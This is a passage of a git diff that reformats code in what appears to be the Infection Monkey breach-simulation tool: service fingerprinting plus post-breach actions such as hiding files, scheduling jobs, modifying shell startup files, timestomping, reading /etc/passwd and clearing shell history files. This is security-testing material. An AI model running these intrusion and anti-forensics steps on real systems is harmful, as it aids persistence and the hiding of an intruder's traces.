'MSSQL' + _SCANNED_SERVICE = "MSSQL" def __init__(self): self._config = infection_monkey.config.WormConfiguration def get_host_fingerprint(self, host): """Gets Microsoft SQL Server instance information by querying the SQL Browser service. - :arg: - host (VictimHost): The MS-SSQL Server to query for information. + :arg: + host (VictimHost): The MS-SSQL Server to query for information. - :returns: - Discovered server information written to the Host info struct. - True if success, False otherwise. + :returns: + Discovered server information written to the Host info struct. + True if success, False otherwise. """ # Create a UDP socket and sets a timeout @@ -37,43 +37,56 @@ class MSSQLFinger(HostFinger): # The message is a CLNT_UCAST_EX packet to get all instances # https://msdn.microsoft.com/en-us/library/cc219745.aspx - message = '\x03' + message = "\x03" # Encode the message as a bytesarray message = message.encode() # send data and receive response try: - LOG.info('Sending message to requested host: {0}, {1}'.format(host, message)) + LOG.info("Sending message to requested host: {0}, {1}".format(host, message)) sock.sendto(message, server_address) data, server = sock.recvfrom(self.BUFFER_SIZE) except socket.timeout: - LOG.info('Socket timeout reached, maybe browser service on host: {0} doesnt exist'.format(host)) + LOG.info( + "Socket timeout reached, maybe browser service on host: {0} doesnt exist".format( + host + ) + ) sock.close() return False except socket.error as e: if e.errno == errno.ECONNRESET: - LOG.info('Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.' - .format(host)) + LOG.info( + "Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.".format( + host + ) + ) else: - LOG.error('An unknown socket error occurred while trying the mssql fingerprint, closing socket.', - exc_info=True) + LOG.error( + "An unknown socket error occurred while trying the mssql fingerprint, closing socket.", + exc_info=True, + ) sock.close() return False - self.init_service(host.services, self._SCANNED_SERVICE, MSSQLFinger.SQL_BROWSER_DEFAULT_PORT) + self.init_service( + host.services, self._SCANNED_SERVICE, MSSQLFinger.SQL_BROWSER_DEFAULT_PORT + ) # Loop through the server data - instances_list = data[3:].decode().split(';;') - LOG.info('{0} MSSQL instances found'.format(len(instances_list))) + instances_list = data[3:].decode().split(";;") + LOG.info("{0} MSSQL instances found".format(len(instances_list))) for instance in instances_list: - instance_info = instance.split(';') + instance_info = instance.split(";") if len(instance_info) > 1: host.services[self._SCANNED_SERVICE][instance_info[1]] = {} for i in range(1, len(instance_info), 2): # Each instance's info is nested under its own name, if there are multiple instances # each will appear under its own name - host.services[self._SCANNED_SERVICE][instance_info[1]][instance_info[i - 1]] = instance_info[i] + host.services[self._SCANNED_SERVICE][instance_info[1]][ + instance_info[i - 1] + ] = instance_info[i] # Close the socket sock.close() diff --git a/monkey/infection_monkey/network/mysqlfinger.py b/monkey/infection_monkey/network/mysqlfinger.py index 968e5361f..c04814c9f 100644 --- a/monkey/infection_monkey/network/mysqlfinger.py +++ b/monkey/infection_monkey/network/mysqlfinger.py @@ -6,15 +6,16 @@ from infection_monkey.network.HostFinger import HostFinger from infection_monkey.network.tools import struct_unpack_tracker, struct_unpack_tracker_string MYSQL_PORT = 3306 -SQL_SERVICE = 'mysqld-3306' +SQL_SERVICE = "mysqld-3306" LOG = logging.getLogger(__name__) class MySQLFinger(HostFinger): """ - Fingerprints mysql databases, only on port 3306 + Fingerprints mysql databases, only on port 3306 """ - _SCANNED_SERVICE = 'MySQL' + + _SCANNED_SERVICE = "MySQL" SOCKET_TIMEOUT = 0.5 HEADER_SIZE = 4 # in bytes @@ -36,7 +37,7 @@ class MySQLFinger(HostFinger): response, curpos = struct_unpack_tracker(header, 0, "I") response = response[0] - response_length = response & 0xff # first byte is significant + response_length = response & 0xFF # first byte is significant data = s.recv(response_length) # now we can start parsing protocol, curpos = struct_unpack_tracker(data, 0, "B") @@ -47,14 +48,16 @@ class MySQLFinger(HostFinger): LOG.debug("Mysql server returned error") return False - version, curpos = struct_unpack_tracker_string(data, curpos) # special coded to solve string parsing + version, curpos = struct_unpack_tracker_string( + data, curpos + ) # special coded to solve string parsing version = version[0].decode() self.init_service(host.services, SQL_SERVICE, MYSQL_PORT) - host.services[SQL_SERVICE]['version'] = version - version = version.split('-')[0].split('.') - host.services[SQL_SERVICE]['major_version'] = version[0] - host.services[SQL_SERVICE]['minor_version'] = version[1] - host.services[SQL_SERVICE]['build_version'] = version[2] + host.services[SQL_SERVICE]["version"] = version + version = version.split("-")[0].split(".") + host.services[SQL_SERVICE]["major_version"] = version[0] + host.services[SQL_SERVICE]["minor_version"] = version[1] + host.services[SQL_SERVICE]["build_version"] = version[2] thread_id, curpos = struct_unpack_tracker(data, curpos, " 1: for subnet_str in WormConfiguration.inaccessible_subnets: - if NetworkScanner._is_any_ip_in_subnet([str(x) for x in self._ip_addresses], subnet_str): + if NetworkScanner._is_any_ip_in_subnet( + [str(x) for x in self._ip_addresses], subnet_str + ): # If machine has IPs from 2 different subnets in the same group, there's no point checking the other # subnet. for other_subnet_str in WormConfiguration.inaccessible_subnets: if other_subnet_str == subnet_str: continue - if not NetworkScanner._is_any_ip_in_subnet([str(x) for x in self._ip_addresses], - other_subnet_str): + if not NetworkScanner._is_any_ip_in_subnet( + [str(x) for x in self._ip_addresses], other_subnet_str + ): subnets_to_scan.append(NetworkRange.get_range_obj(other_subnet_str)) break @@ -74,7 +79,9 @@ class NetworkScanner(object): # Because we are using this to spread out IO heavy tasks, we can probably go a lot higher than CPU core size # But again, balance pool = Pool(ITERATION_BLOCK_SIZE) - victim_generator = VictimHostGenerator(self._ranges, WormConfiguration.blocked_ips, local_ips()) + victim_generator = VictimHostGenerator( + self._ranges, WormConfiguration.blocked_ips, local_ips() + ) victims_count = 0 for victim_chunk in victim_generator.generate_victims(ITERATION_BLOCK_SIZE): diff --git a/monkey/infection_monkey/network/ping_scanner.py b/monkey/infection_monkey/network/ping_scanner.py index fd19550a3..dd1577e47 100644 --- a/monkey/infection_monkey/network/ping_scanner.py +++ b/monkey/infection_monkey/network/ping_scanner.py @@ -8,11 +8,11 @@ import infection_monkey.config from infection_monkey.network.HostFinger import HostFinger from infection_monkey.network.HostScanner import HostScanner -__author__ = 'itamar' +__author__ = "itamar" PING_COUNT_FLAG = "-n" if "win32" == sys.platform else "-c" PING_TIMEOUT_FLAG = "-w" if "win32" == sys.platform else "-W" -TTL_REGEX_STR = r'(?<=TTL\=)[0-9]+' +TTL_REGEX_STR = r"(?<=TTL\=)[0-9]+" LINUX_TTL = 64 WINDOWS_TTL = 128 @@ -20,7 +20,7 @@ LOG = logging.getLogger(__name__) class PingScanner(HostScanner, HostFinger): - _SCANNED_SERVICE = '' + _SCANNED_SERVICE = "" def __init__(self): self._config = infection_monkey.config.WormConfiguration @@ -33,12 +33,11 @@ class PingScanner(HostScanner, HostFinger): if not "win32" == sys.platform: timeout /= 1000 - return 0 == subprocess.call(["ping", - PING_COUNT_FLAG, "1", - PING_TIMEOUT_FLAG, str(timeout), - host.ip_addr], - stdout=self._devnull, - stderr=self._devnull) + return 0 == subprocess.call( + ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr], + stdout=self._devnull, + stderr=self._devnull, + ) def get_host_fingerprint(self, host): @@ -50,7 +49,7 @@ class PingScanner(HostScanner, HostFinger): ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr], stdout=subprocess.PIPE, stderr=subprocess.PIPE, - text=True + text=True, ) output = " ".join(sub_proc.communicate()) @@ -59,9 +58,9 @@ class PingScanner(HostScanner, HostFinger): try: ttl = int(regex_result.group(0)) if ttl <= LINUX_TTL: - host.os['type'] = 'linux' + host.os["type"] = "linux" else: # as far we we know, could also be OSX/BSD but lets handle that when it comes up. - host.os['type'] = 'windows' + host.os["type"] = "windows" host.icmp = True diff --git a/monkey/infection_monkey/network/postgresql_finger.py b/monkey/infection_monkey/network/postgresql_finger.py index 031765dd8..16f6327f9 100644 --- a/monkey/infection_monkey/network/postgresql_finger.py +++ b/monkey/infection_monkey/network/postgresql_finger.py @@ -48,9 +48,7 @@ class PostgreSQLFinger(HostFinger): # if it comes here, the creds worked # this shouldn't happen since capital letters are not supported in postgres usernames # perhaps the service is a honeypot - self.init_service( - host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT - ) + self.init_service(host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT) host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = ( "The PostgreSQL server was unexpectedly accessible with the credentials - " + f"user: '{self.CREDS['username']}' and password: '{self.CREDS['password']}'. Is this a honeypot?" @@ -75,18 +73,13 @@ class PostgreSQLFinger(HostFinger): return False def _is_relevant_exception(self, exception_string): - if not any( - substr in exception_string - for substr in self.RELEVANT_EX_SUBSTRINGS.values() - ): + if not any(substr in exception_string for substr in self.RELEVANT_EX_SUBSTRINGS.values()): # OperationalError due to some other reason - irrelevant exception return False return True def analyze_operational_error(self, host, exception_string): - self.init_service( - host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT - ) + self.init_service(host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT) exceptions = exception_string.split("\n") @@ -98,17 +91,15 @@ class PostgreSQLFinger(HostFinger): else: # SSL not configured self.get_connection_details_ssl_not_configured(exceptions) - host.services[self._SCANNED_SERVICE][ - "communication_encryption_details" - ] = "".join(self.ssl_connection_details) + host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = "".join( + self.ssl_connection_details + ) @staticmethod def is_ssl_configured(exceptions): # when trying to authenticate, it checks pg_hba.conf file: # first, for a record where it can connect with SSL and second, without SSL - if ( - len(exceptions) == 1 - ): # SSL not configured on server so only checks for non-SSL record + if len(exceptions) == 1: # SSL not configured on server so only checks for non-SSL record return False elif len(exceptions) == 2: # SSL configured so checks for both return True @@ -131,22 +122,16 @@ class PostgreSQLFinger(HostFinger): if ( ssl_selected_comms_only ): # if only selected SSL allowed and only selected non-SSL allowed - self.ssl_connection_details[-1] = self.CONNECTION_DETAILS[ - "only_selected" - ] + self.ssl_connection_details[-1] = self.CONNECTION_DETAILS["only_selected"] else: - self.ssl_connection_details.append( - self.CONNECTION_DETAILS["selected_non_ssl"] - ) + self.ssl_connection_details.append(self.CONNECTION_DETAILS["selected_non_ssl"]) def get_connection_details_ssl_not_configured(self, exceptions): self.ssl_connection_details.append(self.CONNECTION_DETAILS["ssl_not_conf"]) if self.found_entry_for_host_but_pwd_auth_failed(exceptions[0]): self.ssl_connection_details.append(self.CONNECTION_DETAILS["all_non_ssl"]) else: - self.ssl_connection_details.append( - self.CONNECTION_DETAILS["selected_non_ssl"] - ) + self.ssl_connection_details.append(self.CONNECTION_DETAILS["selected_non_ssl"]) @staticmethod def found_entry_for_host_but_pwd_auth_failed(exception): diff --git a/monkey/infection_monkey/network/smbfinger.py b/monkey/infection_monkey/network/smbfinger.py index f822822da..457d0213d 100644 --- a/monkey/infection_monkey/network/smbfinger.py +++ b/monkey/infection_monkey/network/smbfinger.py @@ -7,15 +7,17 @@ from odict import odict from infection_monkey.network.HostFinger import HostFinger SMB_PORT = 445 -SMB_SERVICE = 'tcp-445' +SMB_SERVICE = "tcp-445" LOG = logging.getLogger(__name__) class Packet: - fields = odict([ - ("data", ""), - ]) + fields = odict( + [ + ("data", ""), + ] + ) def __init__(self, **kw): self.fields = odict(self.__class__.fields) @@ -26,91 +28,103 @@ class Packet: self.fields[k] = v def to_byte_string(self): - content_list = [(x.to_byte_string() if hasattr(x, "to_byte_string") else x) for x in self.fields.values()] + content_list = [ + (x.to_byte_string() if hasattr(x, "to_byte_string") else x) + for x in self.fields.values() + ] return b"".join(content_list) # SMB Packets class SMBHeader(Packet): - fields = odict([ - ("proto", b"\xff\x53\x4d\x42"), - ("cmd", b"\x72"), - ("errorcode", b"\x00\x00\x00\x00"), - ("flag1", b"\x00"), - ("flag2", b"\x00\x00"), - ("pidhigh", b"\x00\x00"), - ("signature", b"\x00\x00\x00\x00\x00\x00\x00\x00"), - ("reserved", b"\x00\x00"), - ("tid", b"\x00\x00"), - ("pid", b"\x00\x00"), - ("uid", b"\x00\x00"), - ("mid", b"\x00\x00"), - ]) + fields = odict( + [ + ("proto", b"\xff\x53\x4d\x42"), + ("cmd", b"\x72"), + ("errorcode", b"\x00\x00\x00\x00"), + ("flag1", b"\x00"), + ("flag2", b"\x00\x00"), + ("pidhigh", b"\x00\x00"), + ("signature", b"\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", b"\x00\x00"), + ("tid", b"\x00\x00"), + ("pid", b"\x00\x00"), + ("uid", b"\x00\x00"), + ("mid", b"\x00\x00"), + ] + ) class SMBNego(Packet): - fields = odict([ - ("wordcount", b"\x00"), - ("bcc", b"\x62\x00"), - ("data", "") - ]) + fields = odict([("wordcount", b"\x00"), ("bcc", b"\x62\x00"), ("data", "")]) def calculate(self): self.fields["bcc"] = struct.pack(" 0. false || true -> 0. false || false -> 1. So: # if curl works, we're good. @@ -69,12 +78,19 @@ class CommunicateAsNewUser(PBA): :param username: Username from which the command was executed, for reporting back. """ if exit_status == 0: - PostBreachTelem(self, ( - CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)).send() + PostBreachTelem( + self, (CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True) + ).send() else: - PostBreachTelem(self, ( - CREATED_PROCESS_AS_USER_FAILED_FORMAT.format( - commandline, username, exit_status, twos_complement(exit_status)), False)).send() + PostBreachTelem( + self, + ( + CREATED_PROCESS_AS_USER_FAILED_FORMAT.format( + commandline, username, exit_status, twos_complement(exit_status) + ), + False, + ), + ).send() def twos_complement(exit_status): diff --git a/monkey/infection_monkey/post_breach/actions/discover_accounts.py b/monkey/infection_monkey/post_breach/actions/discover_accounts.py index 4d6e5f87d..8fdebd0df 100644 --- a/monkey/infection_monkey/post_breach/actions/discover_accounts.py +++ b/monkey/infection_monkey/post_breach/actions/discover_accounts.py @@ -1,11 +1,13 @@ from common.common_consts.post_breach_consts import POST_BREACH_ACCOUNT_DISCOVERY -from infection_monkey.post_breach.account_discovery.account_discovery import get_commands_to_discover_accounts +from infection_monkey.post_breach.account_discovery.account_discovery import ( + get_commands_to_discover_accounts, +) from infection_monkey.post_breach.pba import PBA class AccountDiscovery(PBA): def __init__(self): linux_cmds, windows_cmds = get_commands_to_discover_accounts() - super().__init__(POST_BREACH_ACCOUNT_DISCOVERY, - linux_cmd=' '.join(linux_cmds), - windows_cmd=windows_cmds) + super().__init__( + POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds + ) diff --git a/monkey/infection_monkey/post_breach/actions/hide_files.py b/monkey/infection_monkey/post_breach/actions/hide_files.py index baba3afea..c6e1d1a6b 100644 --- a/monkey/infection_monkey/post_breach/actions/hide_files.py +++ b/monkey/infection_monkey/post_breach/actions/hide_files.py @@ -2,12 +2,14 @@ from common.common_consts.post_breach_consts import POST_BREACH_HIDDEN_FILES from infection_monkey.post_breach.pba import PBA from infection_monkey.telemetry.post_breach_telem import PostBreachTelem from infection_monkey.utils.environment import is_windows_os -from infection_monkey.utils.hidden_files import (cleanup_hidden_files, get_commands_to_hide_files, - get_commands_to_hide_folders) +from infection_monkey.utils.hidden_files import ( + cleanup_hidden_files, + get_commands_to_hide_files, + get_commands_to_hide_folders, +) from infection_monkey.utils.windows.hidden_files import get_winAPI_to_hide_files -HIDDEN_FSO_CREATION_COMMANDS = [get_commands_to_hide_files, - get_commands_to_hide_folders] +HIDDEN_FSO_CREATION_COMMANDS = [get_commands_to_hide_files, get_commands_to_hide_folders] class HiddenFiles(PBA): @@ -22,9 +24,11 @@ class HiddenFiles(PBA): # create hidden files and folders for function_to_get_commands in HIDDEN_FSO_CREATION_COMMANDS: linux_cmds, windows_cmds = function_to_get_commands() - super(HiddenFiles, self).__init__(name=POST_BREACH_HIDDEN_FILES, - linux_cmd=' '.join(linux_cmds), - windows_cmd=windows_cmds) + super(HiddenFiles, self).__init__( + name=POST_BREACH_HIDDEN_FILES, + linux_cmd=" ".join(linux_cmds), + windows_cmd=windows_cmds, + ) super(HiddenFiles, self).run() if is_windows_os(): # use winAPI result, status = get_winAPI_to_hide_files() diff --git a/monkey/infection_monkey/post_breach/actions/modify_shell_startup_files.py b/monkey/infection_monkey/post_breach/actions/modify_shell_startup_files.py index c10575d39..eea61ed2f 100644 --- a/monkey/infection_monkey/post_breach/actions/modify_shell_startup_files.py +++ b/monkey/infection_monkey/post_breach/actions/modify_shell_startup_files.py @@ -2,8 +2,9 @@ import subprocess from common.common_consts.post_breach_consts import POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION from infection_monkey.post_breach.pba import PBA -from infection_monkey.post_breach.shell_startup_files.shell_startup_files_modification import \ - get_commands_to_modify_shell_startup_files +from infection_monkey.post_breach.shell_startup_files.shell_startup_files_modification import ( + get_commands_to_modify_shell_startup_files, +) from infection_monkey.telemetry.post_breach_telem import PostBreachTelem @@ -24,37 +25,42 @@ class ModifyShellStartupFiles(PBA): def modify_shell_startup_PBA_list(self): return self.ShellStartupPBAGenerator().get_modify_shell_startup_pbas() - class ShellStartupPBAGenerator(): + class ShellStartupPBAGenerator: def get_modify_shell_startup_pbas(self): - (cmds_for_linux, shell_startup_files_for_linux, usernames_for_linux),\ - (cmds_for_windows, shell_startup_files_per_user_for_windows) =\ - get_commands_to_modify_shell_startup_files() + (cmds_for_linux, shell_startup_files_for_linux, usernames_for_linux), ( + cmds_for_windows, + shell_startup_files_per_user_for_windows, + ) = get_commands_to_modify_shell_startup_files() pbas = [] for startup_file_per_user in shell_startup_files_per_user_for_windows: - windows_cmds = ' '.join(cmds_for_windows).format(startup_file_per_user) - pbas.append(self.ModifyShellStartupFile(linux_cmds='', windows_cmds=windows_cmds)) + windows_cmds = " ".join(cmds_for_windows).format(startup_file_per_user) + pbas.append(self.ModifyShellStartupFile(linux_cmds="", windows_cmds=windows_cmds)) for username in usernames_for_linux: for shell_startup_file in shell_startup_files_for_linux: - linux_cmds = ' '.join(cmds_for_linux).format(shell_startup_file).format(username) - pbas.append(self.ModifyShellStartupFile(linux_cmds=linux_cmds, windows_cmds='')) + linux_cmds = ( + " ".join(cmds_for_linux).format(shell_startup_file).format(username) + ) + pbas.append(self.ModifyShellStartupFile(linux_cmds=linux_cmds, windows_cmds="")) return pbas class ModifyShellStartupFile(PBA): def __init__(self, linux_cmds, windows_cmds): - super().__init__(name=POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION, - linux_cmd=linux_cmds, - windows_cmd=windows_cmds) + super().__init__( + name=POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION, + linux_cmd=linux_cmds, + windows_cmd=windows_cmds, + ) def run(self): if self.command: try: - output = subprocess.check_output(self.command, # noqa: DUO116 - stderr=subprocess.STDOUT, - shell=True).decode() + output = subprocess.check_output( + self.command, stderr=subprocess.STDOUT, shell=True # noqa: DUO116 + ).decode() return output, True except subprocess.CalledProcessError as e: # Return error output of the command diff --git a/monkey/infection_monkey/post_breach/actions/schedule_jobs.py b/monkey/infection_monkey/post_breach/actions/schedule_jobs.py index fda4a7379..e7845968a 100644 --- a/monkey/infection_monkey/post_breach/actions/schedule_jobs.py +++ b/monkey/infection_monkey/post_breach/actions/schedule_jobs.py @@ -1,6 +1,8 @@ from common.common_consts.post_breach_consts import POST_BREACH_JOB_SCHEDULING -from infection_monkey.post_breach.job_scheduling.job_scheduling import (get_commands_to_schedule_jobs, - remove_scheduled_jobs) +from infection_monkey.post_breach.job_scheduling.job_scheduling import ( + get_commands_to_schedule_jobs, + remove_scheduled_jobs, +) from infection_monkey.post_breach.pba import PBA @@ -12,9 +14,11 @@ class ScheduleJobs(PBA): def __init__(self): linux_cmds, windows_cmds = get_commands_to_schedule_jobs() - super(ScheduleJobs, self).__init__(name=POST_BREACH_JOB_SCHEDULING, - linux_cmd=' '.join(linux_cmds), - windows_cmd=windows_cmds) + super(ScheduleJobs, self).__init__( + name=POST_BREACH_JOB_SCHEDULING, + linux_cmd=" ".join(linux_cmds), + windows_cmd=windows_cmds, + ) def run(self): super(ScheduleJobs, self).run() diff --git a/monkey/infection_monkey/post_breach/actions/timestomping.py b/monkey/infection_monkey/post_breach/actions/timestomping.py index bf02664eb..ece987107 100644 --- a/monkey/infection_monkey/post_breach/actions/timestomping.py +++ b/monkey/infection_monkey/post_breach/actions/timestomping.py @@ -6,6 +6,4 @@ from infection_monkey.post_breach.timestomping.timestomping import get_timestomp class Timestomping(PBA): def __init__(self): linux_cmds, windows_cmds = get_timestomping_commands() - super().__init__(POST_BREACH_TIMESTOMPING, - linux_cmd=linux_cmds, - windows_cmd=windows_cmds) + super().__init__(POST_BREACH_TIMESTOMPING, linux_cmd=linux_cmds, windows_cmd=windows_cmds) diff --git a/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py b/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py index ed9f665f0..555de4667 100644 --- a/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py +++ b/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py @@ -4,7 +4,9 @@ import subprocess from common.common_consts.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC from infection_monkey.post_breach.pba import PBA from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import ( - cleanup_changes, get_commands_to_proxy_execution_using_signed_script) + cleanup_changes, + get_commands_to_proxy_execution_using_signed_script, +) from infection_monkey.utils.environment import is_windows_os LOG = logging.getLogger(__name__) @@ -13,18 +15,20 @@ LOG = logging.getLogger(__name__) class SignedScriptProxyExecution(PBA): def __init__(self): windows_cmds = get_commands_to_proxy_execution_using_signed_script() - super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC, - windows_cmd=' '.join(windows_cmds)) + super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC, windows_cmd=" ".join(windows_cmds)) def run(self): try: - original_comspec = '' + original_comspec = "" if is_windows_os(): - original_comspec =\ - subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116 + original_comspec = subprocess.check_output( + "if defined COMSPEC echo %COMSPEC%", shell=True + ).decode() # noqa: DUO116 super().run() except Exception as e: - LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}") + LOG.warning( + f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}" + ) finally: cleanup_changes(original_comspec) diff --git a/monkey/infection_monkey/post_breach/actions/use_trap_command.py b/monkey/infection_monkey/post_breach/actions/use_trap_command.py index 7afd2e631..9f6afc829 100644 --- a/monkey/infection_monkey/post_breach/actions/use_trap_command.py +++ b/monkey/infection_monkey/post_breach/actions/use_trap_command.py @@ -6,5 +6,4 @@ from infection_monkey.post_breach.trap_command.trap_command import get_trap_comm class TrapCommand(PBA): def __init__(self): linux_cmds = get_trap_commands() - super(TrapCommand, self).__init__(POST_BREACH_TRAP_COMMAND, - linux_cmd=linux_cmds) + super(TrapCommand, self).__init__(POST_BREACH_TRAP_COMMAND, linux_cmd=linux_cmds) diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py index dd723c14d..5ecae1b5e 100644 --- a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py @@ -13,10 +13,10 @@ from infection_monkey.utils.monkey_dir import get_monkey_dir_path LOG = logging.getLogger(__name__) -__author__ = 'VakarisZ' +__author__ = "VakarisZ" -DIR_CHANGE_WINDOWS = 'cd %s & ' -DIR_CHANGE_LINUX = 'cd %s ; ' +DIR_CHANGE_WINDOWS = "cd %s & " +DIR_CHANGE_LINUX = "cd %s ; " class UsersPBA(PBA): @@ -26,7 +26,7 @@ class UsersPBA(PBA): def __init__(self): super(UsersPBA, self).__init__(POST_BREACH_FILE_EXECUTION) - self.filename = '' + self.filename = "" if not is_windows_os(): # Add linux commands to PBA's @@ -34,7 +34,9 @@ class UsersPBA(PBA): self.filename = WormConfiguration.PBA_linux_filename if WormConfiguration.custom_PBA_linux_cmd: # Add change dir command, because user will try to access his file - self.command = (DIR_CHANGE_LINUX % get_monkey_dir_path()) + WormConfiguration.custom_PBA_linux_cmd + self.command = ( + DIR_CHANGE_LINUX % get_monkey_dir_path() + ) + WormConfiguration.custom_PBA_linux_cmd elif WormConfiguration.custom_PBA_linux_cmd: self.command = WormConfiguration.custom_PBA_linux_cmd else: @@ -43,7 +45,9 @@ class UsersPBA(PBA): self.filename = WormConfiguration.PBA_windows_filename if WormConfiguration.custom_PBA_windows_cmd: # Add change dir command, because user will try to access his file - self.command = (DIR_CHANGE_WINDOWS % get_monkey_dir_path()) + WormConfiguration.custom_PBA_windows_cmd + self.command = ( + DIR_CHANGE_WINDOWS % get_monkey_dir_path() + ) + WormConfiguration.custom_PBA_windows_cmd elif WormConfiguration.custom_PBA_windows_cmd: self.command = WormConfiguration.custom_PBA_windows_cmd @@ -81,16 +85,18 @@ class UsersPBA(PBA): if not status: status = ScanStatus.USED - T1105Telem(status, - WormConfiguration.current_server.split(':')[0], - get_interface_to_target(WormConfiguration.current_server.split(':')[0]), - filename).send() + T1105Telem( + status, + WormConfiguration.current_server.split(":")[0], + get_interface_to_target(WormConfiguration.current_server.split(":")[0]), + filename, + ).send() if status == ScanStatus.SCANNED: return False try: - with open(os.path.join(dst_dir, filename), 'wb') as written_PBA_file: + with open(os.path.join(dst_dir, filename), "wb") as written_PBA_file: written_PBA_file.write(pba_file_contents.content) return True except IOError as e: diff --git a/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py b/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py index a5e8d7d44..fab63095e 100644 --- a/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py +++ b/monkey/infection_monkey/post_breach/clear_command_history/clear_command_history.py @@ -1,11 +1,14 @@ from infection_monkey.post_breach.clear_command_history.linux_clear_command_history import ( - get_linux_command_history_files, get_linux_commands_to_clear_command_history, get_linux_usernames) + get_linux_command_history_files, + get_linux_commands_to_clear_command_history, + get_linux_usernames, +) def get_commands_to_clear_command_history(): - (linux_cmds, - linux_cmd_hist_files, - linux_usernames) = (get_linux_commands_to_clear_command_history(), - get_linux_command_history_files(), - get_linux_usernames()) + (linux_cmds, linux_cmd_hist_files, linux_usernames) = ( + get_linux_commands_to_clear_command_history(), + get_linux_command_history_files(), + get_linux_usernames(), + ) return linux_cmds, linux_cmd_hist_files, linux_usernames diff --git a/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py b/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py index a3545f124..642a42d5a 100644 --- a/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py +++ b/monkey/infection_monkey/post_breach/clear_command_history/linux_clear_command_history.py @@ -5,19 +5,18 @@ from infection_monkey.utils.environment import is_windows_os def get_linux_commands_to_clear_command_history(): if is_windows_os(): - return '' + return "" - TEMP_HIST_FILE = '$HOME/monkey-temp-hist-file' + TEMP_HIST_FILE = "$HOME/monkey-temp-hist-file" return [ - '3<{0} 3<&- && ', # check for existence of file - 'cat {0} ' # copy contents of history file to... - f'> {TEMP_HIST_FILE} && ', # ...temporary file - 'echo > {0} && ', # clear contents of file - 'echo \"Successfully cleared {0}\" && ', # if successfully cleared - f'cat {TEMP_HIST_FILE} ', # restore history file back with... - '> {0} ;' # ...original contents - f'rm {TEMP_HIST_FILE} -f' # remove temp history file + "3<{0} 3<&- && ", # check for existence of file + "cat {0} " # copy contents of history file to... + f"> {TEMP_HIST_FILE} && ", # ...temporary file + "echo > {0} && ", # clear contents of file + 'echo "Successfully cleared {0}" && ', # if successfully cleared + f"cat {TEMP_HIST_FILE} ", # restore history file back with... + "> {0} ;" f"rm {TEMP_HIST_FILE} -f", # ...original contents # remove temp history file ] @@ -29,13 +28,13 @@ def get_linux_command_history_files(): # get list of paths of different shell history files (default values) with place for username STARTUP_FILES = [ - file_path.format(HOME_DIR) for file_path in - [ - "{0}{{0}}/.bash_history", # bash - "{0}{{0}}/.local/share/fish/fish_history", # fish - "{0}{{0}}/.zsh_history", # zsh - "{0}{{0}}/.sh_history", # ksh - "{0}{{0}}/.history" # csh, tcsh + file_path.format(HOME_DIR) + for file_path in [ + "{0}{{0}}/.bash_history", # bash + "{0}{{0}}/.local/share/fish/fish_history", # fish + "{0}{{0}}/.zsh_history", # zsh + "{0}{{0}}/.sh_history", # ksh + "{0}{{0}}/.history", # csh, tcsh ] ] @@ -47,9 +46,12 @@ def get_linux_usernames(): return [] # get list of usernames - USERS = subprocess.check_output( # noqa: DUO116 - "cut -d: -f1,3 /etc/passwd | egrep ':[0-9]{4}$' | cut -d: -f1", - shell=True - ).decode().split('\n')[:-1] + USERS = ( + subprocess.check_output( # noqa: DUO116 + "cut -d: -f1,3 /etc/passwd | egrep ':[0-9]{4}$' | cut -d: -f1", shell=True + ) + .decode() + .split("\n")[:-1] + ) return USERS diff --git a/monkey/infection_monkey/post_breach/job_scheduling/job_scheduling.py b/monkey/infection_monkey/post_breach/job_scheduling/job_scheduling.py index f7bceef72..a38aa815b 100644 --- a/monkey/infection_monkey/post_breach/job_scheduling/job_scheduling.py +++ b/monkey/infection_monkey/post_breach/job_scheduling/job_scheduling.py @@ -1,8 +1,12 @@ import subprocess -from infection_monkey.post_breach.job_scheduling.linux_job_scheduling import get_linux_commands_to_schedule_jobs +from infection_monkey.post_breach.job_scheduling.linux_job_scheduling import ( + get_linux_commands_to_schedule_jobs, +) from infection_monkey.post_breach.job_scheduling.windows_job_scheduling import ( - get_windows_commands_to_remove_scheduled_jobs, get_windows_commands_to_schedule_jobs) + get_windows_commands_to_remove_scheduled_jobs, + get_windows_commands_to_schedule_jobs, +) from 